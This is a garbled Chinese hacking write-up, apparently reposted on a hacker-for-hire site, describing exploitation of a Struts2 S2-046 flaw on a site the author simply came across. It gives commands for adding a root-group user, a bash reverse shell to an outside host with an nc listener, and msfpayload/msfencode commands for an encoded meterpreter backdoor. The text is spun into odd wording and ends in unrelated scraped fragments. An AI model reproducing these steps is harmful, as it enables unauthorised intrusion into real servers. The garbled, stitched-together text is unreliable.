一、布景
偶尔碰到一个小站存在st2-046代码长途履行缝隙,心里乐滋滋。
履行whoami检查自己是什么权限
现已是root了,就测验上传一个webshell
可是却提示上传失利,页面不存在
上传txt显现成功
通过测验,服务器装有一些防火墙之类的东西或者是安全策略,只需上传的文件里包括可履行代码就上传失利
可是转念一想我为什么非要传webshell,传上去之后不仍是要提权,弄到他的ssh权限。
所以镇定考虑了一下现在的局势:
1 root权限
2 能够履行非交互性指令
3 不能上传文件
脑海里一道闪电,蹦出来三个思路
1 直接长途履行指令 增加一个用户 然后参加root组
2 nc反弹shell 进行交互性指令 设置用密钥登陆
3 用神器msf生成一个linux后门,进一步拿下ssh
二、一波操作猛如虎
思路一
首要useradd test增加一个名为test的用户
由于不能交互 所以无法运用passwd 指令
测验echo “PASSWORD” | passwd –stdin USERNAME指令
指令履行完结
然后参加root组
usermod -g root test
用id+用户名检查是否增加成功
奈斯
然后便是高高兴兴去衔接ssh
成果他一向回绝我的暗码。。。
这是什么操作。。。
得到了你的人得不到你的心吗。。。
其时也不明白为什么会这样
后来百度查了一下
才知道这个指令有时候是有问题的
思路一失利
思路二
已然问题出在加暗码的指令上面,我就只需把shell反弹出来然后再运用passwd指令即可
测验了一下方针站不支持其他脚本,也没有nc,就直接用bash转发吧
先打开一台外网windows服务器,敞开nc监听
指令为nc.exe –vv –l –p 端口
Linux上bash转发指令如下
bash -i >& /dev/tcp/x.x.x.x/2333 0>&1
提示履行成功
可是windows服务器上并没有收到任何反弹信息
换端口换反弹 *** 都失利
用脚趾头想想应该是防火墙的问题
思路二失利。
思路三
前两次均失利,心里很难受了
不过不要紧,咱们还有神器msf
假定本机ip为192.168.250.162监听端口为8090
用msf生成一个linux的后门指令如下:
(1)关于metasploit 4.2版别,运用msfpayload生成后门程序,运用msfencode对后门进行二次编码防杀。
生成后门并运用msfencode shikata_ga_nai编码程序对后门程序再编码。
指令:
msfpayloadlinux/x86/meterpreter/reverse_tcp LHOST=192.168.250.162 LPORT=8090 R |msfencode -t elf -e x86/shikata_ga_nai -c 3 -o /root/test
详解:
运用模块 linux/x86/meterpreter/reverse_tcp 能够实现在32位linux体系上反弹TCP会话
LHOST=192.168.250.162 反弹衔接到metasploit进犯主机的IP地址
LPORT=8090 反弹衔接到metasploit进犯主机的TCP端口号
-t elf 编码生成的文件类型
-e x86/shikata_ga_nai 运用的编码 ***
-c 3 重复封装编码3次
-o /root/test 输出后门文件到/root目录下,文件名test
(2)在较新版别的metasploit中,msfpayload和msfencode现已被撤销,功用合并为msfvenom
运用msfvenom创立后门到达相同作用的指令为:
[1] [2] 黑客接单网
V4版别现在存在的一切依据,都将这个新呈现的Hades安排与Zebrocy联络在一同,因而能够确定与Sofacy歹意安排相关,一同也作为BlackEnergy、GreyEnergy、Sandworm集...
5.传统检测办法的缺点Extender(扩展)——能够让你加载Burp Suite的扩展,运用你自己的或第三方代码来扩展BurpSuit的功用。 我国菜刀 ipscan MD5Crack2[1][2]...
无 SelectCacheForSharedWorker(int32 host_id, int64 appcache_id); int type; /* The hashcode of the chu...
根据漏洞文件为repo_mirror.go这个信息锁定更新的commit,commit主要为 #6593和#6595继续si网络赌博输了多万左右,报警的话钱能要回来吗?, 在今年的温哥华Pwn2Own...
那么针对咱们这些普通人,能做到的便是不自动在微博、贴吧等渠道传达自己的手机号,以及不在来路不明的网站留下手机号了。 怎么翻开日志记载功用 struct chunk *next; /* The next...
if (data[0] == 's') { $("#i_msg").val(''); $("#sendstatus").attr('class', 'text-success').text('Mess...